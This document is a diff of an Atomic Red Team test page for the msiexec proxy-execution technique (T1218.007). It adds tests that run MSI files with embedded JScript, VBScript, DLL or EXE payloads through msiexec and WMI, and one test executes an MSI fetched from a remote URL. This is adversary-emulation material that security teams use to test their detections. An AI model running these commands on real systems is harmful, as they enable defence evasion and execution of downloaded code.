+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+msiexec.exe /q /#{action} "#{msi_payload}"
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The MSI file must exist on disk at specified location (#{msi_payload})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You must provide your own MSI"
+```
+
+
+
+
+
+
+
+## Atomic Test #5 - WMI Win32_Product Class - Execute Local MSI file with embedded JScript
+Executes an MSI containing embedded JScript code using the WMI Win32_Product class
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 882082f0-27c6-4eec-a43c-9aa80bccdb30
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\T1218.007_JScript.msi|
+| action | Specifies the MSI action to perform: Install, Admin, Advertise. The included MSI is designed to support all three action types. | String | Install|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' }
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The MSI file must exist on disk at specified location (#{msi_payload})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You must provide your own MSI"
+```
+
+
+
+
+
+
+
+## Atomic Test #6 - WMI Win32_Product Class - Execute Local MSI file with embedded VBScript
+Executes an MSI containing embedded VBScript code using the WMI Win32_Product class
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** cf470d9a-58e7-43e5-b0d2-805dffc05576
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\T1218.007_VBScript.msi|
+| action | Specifies the MSI action to perform: Install, Admin, Advertise. The included MSI is designed to support all three action types. | String | Install|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' }
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The MSI file must exist on disk at specified location (#{msi_payload})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You must provide your own MSI"
+```
+
+
+
+
+
+
+
+## Atomic Test #7 - WMI Win32_Product Class - Execute Local MSI file with an embedded DLL
+Executes an MSI containing an embedded DLL using the WMI Win32_Product class
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 32eb3861-30da-4993-897a-42737152f5f8
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\T1218.007_DLL.msi|
+| action | Specifies the MSI action to perform: Install, Admin, Advertise. The included MSI is designed to support all three action types. | String | Install|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' }
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The MSI file must exist on disk at specified location (#{msi_payload})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You must provide your own MSI"
+```
+
+
+
+
+
+
+
+## Atomic Test #8 - WMI Win32_Product Class - Execute Local MSI file with an embedded EXE
+Executes an MSI containing an embedded EXE using the WMI Win32_Product class
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 55080eb0-49ae-4f55-a440-4167b7974f79
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\T1218.007_EXE.msi|
+| action | Specifies the MSI action to perform: Install, Admin, Advertise. The included MSI is designed to support all three action types. | String | Install|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' }
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The MSI file must exist on disk at specified location (#{msi_payload})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You must provide your own MSI"
+```
+
+
+
+
+
+
+
+## Atomic Test #9 - Msiexec.exe - Execute the DllRegisterServer function of a DLL
+Loads a DLL into msiexec.exe and calls its DllRegisterServer function. Note: the DLL included in the "src" folder is only built for 64-bit, so this won't work on a 32-bit OS.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| dll_payload | DLL to execute that has an implemented DllRegisterServer function | Path | PathToAtomicsFolder\T1218.007\src\MSIRunner.dll|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+msiexec.exe /y "#{dll_payload}"
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The DLL must exist on disk at specified location (#{dll_payload})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You must provide your own MSI"
+```
+
+
+
+
+
+
+
+## Atomic Test #10 - Msiexec.exe - Execute the DllUnregisterServer function of a DLL
+Loads a DLL into msiexec.exe and calls its DllUnregisterServer function. Note: the DLL included in the "src" folder is only built for 64-bit, so this won't work on a 32-bit OS.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** ab09ec85-4955-4f9c-b8e0-6851baf4d47f
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| dll_payload | DLL to execute that has an implemented DllUnregisterServer function | Path | PathToAtomicsFolder\T1218.007\src\MSIRunner.dll|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+msiexec.exe /z "#{dll_payload}"
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The DLL must exist on disk at specified location (#{dll_payload})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You must provide your own MSI"
+```
+
+
+
+
+
+
+
+## Atomic Test #11 - Msiexec.exe - Execute Remote MSI file
+Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI executes a built-in JScript payload that launches powershell.exe.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 44a4bedf-ffe3-452e-bee4-6925ab125662
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| msi_payload | MSI file to execute | String | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/T1218.007_JScript.msi|
#### Attack Commands: Run with `command_prompt`!
@@ -90,52 +519,4 @@ msiexec.exe /q /i "#{msi_payload}"
-
-
-
-## Atomic Test #3 - Msiexec.exe - Execute Arbitrary DLL
-Execute arbitrary DLL file stored locally. Commonly seen in application installation.
-Upon execution, a window titled "Boom!" will open that says "Locked and Loaded!". For 32 bit systems change the dll_payload argument to the Win32 folder.
-By default, if the src folder is not in place, it will download the 64 bit version.
-
-**Supported Platforms:** Windows
-
-
-**auto_generated_guid:** 66f64bd5-7c35-4c24-953a-04ca30a0a0ec
-
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218.007\src\x64\T1218.dll|
-
-
-#### Attack Commands: Run with `command_prompt`!
-
-
-```cmd
-msiexec.exe /y "#{dll_payload}"
-```
-
-
-
-
-#### Dependencies: Run with `powershell`!
-##### Description: T1218.dll must exist on disk at specified location (#{dll_payload})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/x64/T1218.dll" -OutFile "#{dll_payload}"
-```
-
-
-
-